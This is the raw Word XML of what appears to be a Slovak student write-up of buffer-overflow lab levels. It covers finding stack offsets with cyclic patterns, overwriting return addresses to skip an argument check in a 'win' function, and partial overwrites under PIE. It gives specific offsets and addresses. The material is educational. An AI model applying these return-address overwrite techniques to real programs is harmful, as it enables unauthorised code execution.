    <w:p w14:paraId="3A750EA1" w14:textId="30AD4B8F" w:rsidR="00AE0134" w:rsidRDefault="00AE0134" w:rsidP="0075283F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Pr="0079414C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>. Zistenie offsetu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735415C9" w14:textId="29EFE149" w:rsidR="00E15F11" w:rsidRPr="00E15F11" w:rsidRDefault="00AE0134" w:rsidP="00E15F11">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE0134">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Offset sme hľadali pomocou cyklického patternu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, na veľkosť vstupu neboli žiadne obmedzenia, čiže postup</w:t>
      </w:r>
      <w:r w:rsidR="00E15F11">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> bol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rovnaký ako v leveli 1.</w:t>
      </w:r>
      <w:r w:rsidR="00E15F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fset = </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0134">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>136</w:t>
      </w:r>
      <w:r w:rsidR="004D0ECA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C686EF7" w14:textId="598B5C61" w:rsidR="00AE0134" w:rsidRDefault="00AE0134" w:rsidP="00AE01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Pr="0079414C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>. Prepísanie návratovej adresy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B9A096" w14:textId="3FF26A3E" w:rsidR="00AE0134" w:rsidRPr="00AE0134" w:rsidRDefault="00AE0134" w:rsidP="00E15F11">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE0134">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pri prepisovaní adresy nastal problém v tom, že funkcia win potrebovala vstupný argument </w:t>
      </w:r>
      <w:r w:rsidRPr="00E15F11">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0xdeadbeef</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0134">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> na to, aby otvorila súbor.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Preto sme nemohli skočiť na začiatok win</w:t>
      </w:r>
      <w:r w:rsidR="00E15F11">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00E15F11" w:rsidRPr="00E15F11">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0x401216</w:t>
      </w:r>
      <w:r w:rsidR="00E15F11">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, lebo by sme sa potom nedostali do správnej if vetvy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417432C3" w14:textId="2464B90C" w:rsidR="00AE0134" w:rsidRDefault="00E15F11" w:rsidP="00E15F11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BBAD4" wp14:editId="7CE139FC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3192379</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1579278</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1455821" cy="29677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21" cy="29677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5FDC" w14:textId="36ED5166" w:rsidR="00E15F11" w:rsidRPr="00E15F11" w:rsidRDefault="00E15F11" w:rsidP="00E15F11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Sem treba skoči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BAD4" id="Rectangle 28" o:spid="_x0000_s1029" style="position:absolute;left:0;text-align:left;margin-left:251.35pt;margin-top:124.35pt;width:114.6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" filled="f" stroked="f" strokeweight="2.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="579D5FDC" w14:textId="36ED5166" w:rsidR="00E15F11" w:rsidRPr="00E15F11" w:rsidRDefault="00E15F11" w:rsidP="00E15F11">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:rPr>
                          <w:color w:val="00B05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Sem treba skoči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8FCB2" wp14:editId="3C38D881">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3567129</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>896586</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1455821" cy="481263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21" cy="48126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02BE" w14:textId="77777777" w:rsidR="00E15F11" w:rsidRPr="00E15F11" w:rsidRDefault="00E15F11" w:rsidP="00E15F11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5F11">
                              <w:rPr>
                                <w:color w:val="00B05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 xml:space="preserve">Kontrola </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="026C46DA" w14:textId="187451FD" w:rsidR="00E15F11" w:rsidRPr="00E15F11" w:rsidRDefault="00E15F11" w:rsidP="00E15F11">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                              <w:rPr>
                                <w:color w:val="00B05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5F11">
                              <w:rPr>
                                <w:color w:val="00B05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parame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FCB2" id="Rectangle 27" o:spid="_x0000_s1030" style="position:absolute;left:0;text-align:left;margin-left:280.9pt;margin-top:70.6pt;width:114.65pt;height:3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" filled="f" stroked="f" strokeweight="2.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="417A02BE" w14:textId="77777777" w:rsidR="00E15F11" w:rsidRPr="00E15F11" w:rsidRDefault="00E15F11" w:rsidP="00E15F11">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:rPr>
                          <w:color w:val="00B05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 w:rsidRPr="00E15F11">
                        <w:rPr>
                          <w:color w:val="00B05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 xml:space="preserve">Kontrola </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="026C46DA" w14:textId="187451FD" w:rsidR="00E15F11" w:rsidRPr="00E15F11" w:rsidRDefault="00E15F11" w:rsidP="00E15F11">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:rPr>
                          <w:color w:val="00B05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 w:rsidRPr="00E15F11">
                        <w:rPr>
                          <w:color w:val="00B05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paramet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E2FDE" wp14:editId="0084D027">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1866900</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1648460</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1356784" cy="154517"/>
                <wp:effectExtent l="19050" t="19050" r="1524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784" cy="154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AE31" id="Rectangle 25" o:spid="_x0000_s1026" style="position:absolute;margin-left:147pt;margin-top:129.8pt;width:106.8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" filled="f" strokecolor="#00b050" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AE01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F472D" wp14:editId="69D8AB69">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2026920</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>967105</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1572684" cy="351155"/>
                <wp:effectExtent l="19050" t="19050" r="2794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684" cy="35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2EA9" id="Rectangle 26" o:spid="_x0000_s1026" style="position:absolute;margin-left:159.6pt;margin-top:76.15pt;width:123.8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" filled="f" strokecolor="#00b050" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AE0134" w:rsidRPr="00AE0134">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B7C2917" wp14:editId="208FCC25">
            <wp:extent cx="3567545" cy="3036078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17"/>
                    <a:srcRect r="12737"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3593476" cy="30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62CC" w14:textId="77777777" w:rsidR="00943572" w:rsidRDefault="00943572" w:rsidP="00513EA3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D3FF5F" w14:textId="18080EE0" w:rsidR="00E15F11" w:rsidRPr="00AE0134" w:rsidRDefault="00E15F11" w:rsidP="00513EA3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE0134">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Keď túto kontrolu preskočíme a prepíšeme </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>návratovú adresu</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0134">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> na adresu inštrukcie za </w:t>
      </w:r>
      <w:r w:rsidR="00513EA3">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0134">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidR="00513EA3">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15F11">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0x40123d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0134">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, flag sa prečíta bez toho, aby sme potrebovali vstupný parameter. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A0ECE3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4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09AC6F00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4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ces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/memory_level_4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72AFEC2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4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200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77C3551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4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136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64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x40123d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offset 136 + adresa za if</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431619ED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4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41ED6719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4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1B8FDFF" w14:textId="677A74DA" w:rsidR="000C3308" w:rsidRDefault="02999ACC" w:rsidP="000C3308">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Level 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1483AE6C" w14:textId="53645DF0" w:rsidR="00E15F11" w:rsidRDefault="004D0ECA" w:rsidP="0075283F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E15F11" w:rsidRPr="00AE0134">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E15F11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Zistenie offsetu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DFDC44" w14:textId="10D3ABEA" w:rsidR="005D11E6" w:rsidRPr="00E15F11" w:rsidRDefault="005D11E6" w:rsidP="005D11E6">
      <w:pPr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Po</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0134">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mocou cyklického patternu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sme našli offset = </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0134">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>68</w:t>
      </w:r>
      <w:r w:rsidR="004D0ECA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D778ED4" w14:textId="0520ED8F" w:rsidR="005D11E6" w:rsidRDefault="00F7282A" w:rsidP="005D11E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5D11E6" w:rsidRPr="0079414C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>. Prepísanie návratovej adresy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4519D781" w14:textId="5A8B65E2" w:rsidR="004D0ECA" w:rsidRPr="004D0ECA" w:rsidRDefault="004D0ECA" w:rsidP="004D0ECA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0ECA">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rovnako ako v úlohe 4 potrebujeme preskočiť kontrolu vstupného parametra vuln funkcie, čiže musíme prepísať návratovú adresu na adresu inštrukcie za </w:t>
      </w:r>
      <w:r w:rsidR="002A1BF9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0ECA">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidR="002A1BF9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00A70B3C">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, t.j. adresa </w:t>
      </w:r>
      <w:r w:rsidR="00A70B3C" w:rsidRPr="0025475D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>win + 0x27</w:t>
      </w:r>
      <w:r w:rsidR="00A70B3C">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0002F853" w14:textId="0A5A593B" w:rsidR="00211E37" w:rsidRDefault="004D0ECA" w:rsidP="004D0ECA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0ECA">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>V tejto úlohe bol zapnutý PIE flag</w:t>
      </w:r>
      <w:r w:rsidR="00705500">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a nemohli </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0ECA">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sme vyčítať správnu adresu priamo z Binary Ninja</w:t>
      </w:r>
      <w:r w:rsidR="00A70B3C">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, pretože sa pri každom spustení mení. V gdb sme </w:t>
      </w:r>
      <w:r w:rsidR="009149D7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">preto </w:t>
      </w:r>
      <w:r w:rsidR="00A70B3C">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sledovali, ako vyzerá návratová adresa a adresa win funkcie a</w:t>
      </w:r>
      <w:r w:rsidR="008C6E03">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> tieto adresy sme porovnali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0556A2" w14:textId="793DFA05" w:rsidR="006F08BE" w:rsidRDefault="002A1BF9" w:rsidP="004D0ECA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr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2930C" wp14:editId="1B0042BC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1745615</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>678180</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1246909" cy="29146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4EB0" w14:textId="16682AF3" w:rsidR="00211E37" w:rsidRPr="004C1622" w:rsidRDefault="00211E37" w:rsidP="00211E37">
                            <w:pPr>
                              <w:spacing w:after="0"/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Adresa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930C" id="Rectangle 16" o:spid="_x0000_s1031" style="position:absolute;left:0;text-align:left;margin-left:137.45pt;margin-top:53.4pt;width:98.2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" filled="f" stroked="f" strokeweight="2.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0DC04EB0" w14:textId="16682AF3" w:rsidR="00211E37" w:rsidRPr="004C1622" w:rsidRDefault="00211E37" w:rsidP="00211E37">
                      <w:pPr>
                        <w:spacing w:after="0"/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Adresa win</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r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6262D" wp14:editId="40FBF570">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>772160</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1786255" cy="220980"/>
                <wp:effectExtent l="19050" t="19050" r="2349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2BB22" id="Rectangle 15" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:60.8pt;width:140.65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" filled="f" strokecolor="#00b050" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008C6E03" w:rsidRPr="00211E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28DE6" wp14:editId="11F860E7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2431415</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5080</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1246909" cy="2914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97C62" w14:textId="77777777" w:rsidR="00211E37" w:rsidRPr="004C1622" w:rsidRDefault="00211E37" w:rsidP="00211E37">
                            <w:pPr>
                              <w:spacing w:after="0"/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1622"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Návratová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8DE6" id="Rectangle 9" o:spid="_x0000_s1032" style="position:absolute;left:0;text-align:left;margin-left:191.45pt;margin-top:.4pt;width:98.2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" filled="f" stroked="f" strokeweight="2.25pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1A497C62" w14:textId="77777777" w:rsidR="00211E37" w:rsidRPr="004C1622" w:rsidRDefault="00211E37" w:rsidP="00211E37">
                      <w:pPr>
                        <w:spacing w:after="0"/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 w:rsidRPr="004C1622"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Návratová adresa</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008C6E03" w:rsidRPr="00211E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53AAF" wp14:editId="67CD394C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1665605</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1270</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="825012" cy="150935"/>
                <wp:effectExtent l="19050" t="19050" r="1333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012" cy="150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359C" id="Rectangle 7" o:spid="_x0000_s1026" style="position:absolute;margin-left:131.15pt;margin-top:-.1pt;width:64.95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" filled="f" strokecolor="#00b050" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00211E37" w:rsidRPr="00211E37">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32C65060" wp14:editId="7E29EAE0">
            <wp:extent cx="5731510" cy="99504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260E" w14:textId="791BBB86" w:rsidR="008C6E03" w:rsidRDefault="008C6E03" w:rsidP="005840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r. pre 2 spustenia programu sme videli, že sa adresy líšia iba 2 spodnými bajtmi a posledný bajt win adresy (posunutej o + </w:t>
      </w:r>
      <w:r w:rsidR="0025475D" w:rsidRPr="0025475D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0x27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, keďže skáčeme až za </w:t>
      </w:r>
      <w:r w:rsidR="002A1BF9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidR="002A1BF9" w:rsidRPr="004D0ECA">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidR="002A1BF9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) bol vždy rovnaký = 80 (</w:t>
      </w:r>
      <w:r w:rsidR="00DE7C82">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">x50). </w:t>
      </w:r>
      <w:r w:rsidR="00850469">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Predposledný bajt sa menil, ale bol vždy v tvare </w:t>
      </w:r>
      <w:r w:rsidR="00850469" w:rsidRPr="00850469">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>\x_2</w:t>
      </w:r>
      <w:r w:rsidR="00850469" w:rsidRPr="00850469">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00850469">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(130=</w:t>
      </w:r>
      <w:r w:rsidR="00DE7C82">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00850469">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">x82, 66 = </w:t>
      </w:r>
      <w:r w:rsidR="00DE7C82">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00850469">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">x42 atď.). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654EF942" w14:textId="755B8759" w:rsidR="008A1D6F" w:rsidRPr="00943572" w:rsidRDefault="008C6E03" w:rsidP="00943572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D25F5" wp14:editId="311AABBA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3740150</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>936625</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4953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A76D9" id="Straight Connector 3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5pt,73.75pt" to="333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CEC7D" wp14:editId="1A35929C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3762375</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>492760</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4953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42476" id="Straight Connector 3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25pt,38.8pt" to="33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24496" wp14:editId="6206810F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1050925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>476885</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4953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98AFE" id="Straight Connector 3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5pt,37.55pt" to="121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776B4" wp14:editId="0B4601EF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1025525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>937260</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4953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83777" id="Straight Connector 3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5pt,73.8pt" to="119.7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>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00244359">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ADF026F" wp14:editId="586D49F1">
            <wp:extent cx="2730414" cy="9360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9"/>
                    <a:srcRect t="5018" r="3854" b="50251"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
